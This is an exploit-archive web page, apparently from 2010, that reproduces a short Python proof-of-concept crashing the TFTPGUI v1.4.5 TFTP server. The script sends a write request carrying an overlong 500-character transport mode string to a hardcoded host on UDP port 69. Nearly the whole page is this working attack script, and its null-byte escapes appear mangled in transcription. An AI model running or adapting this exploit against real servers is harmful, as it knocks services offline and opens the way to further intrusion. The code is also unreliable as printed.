TFTPGUI v1.4.5 Long Transport Mode Overflow
Posted on 02 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TFTPGUI v1.4.5 Long Transport Mode Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== TFTPGUI v1.4.5 Long Transport Mode Overflow =========================================== #!/usr/bin/python print " #################################################################" print "## RedTeam Security ##" print "## TFTPGUI Long Transport Mode Overflow ##" print "## Version 1.4.5 ##" print "## LIST Vulnerability ##" print "## ##" print "## Jeremiah Talamantes ##" print "## labs@redteamsecure.com ##" print "################################################################# " import socket import sys # Change these values to suit your needs host = '192.168.1.108' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "Error: unable to connect." sys.exit(1) # Creating the overly long transport mode string fn = "A" md = "A" * 500 stuff = "x00x02" + fn + " " + md + " " # Send data s.sendto(stuff, (host, port)) print "Check to see if TFTPGUI is still running..." # End # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>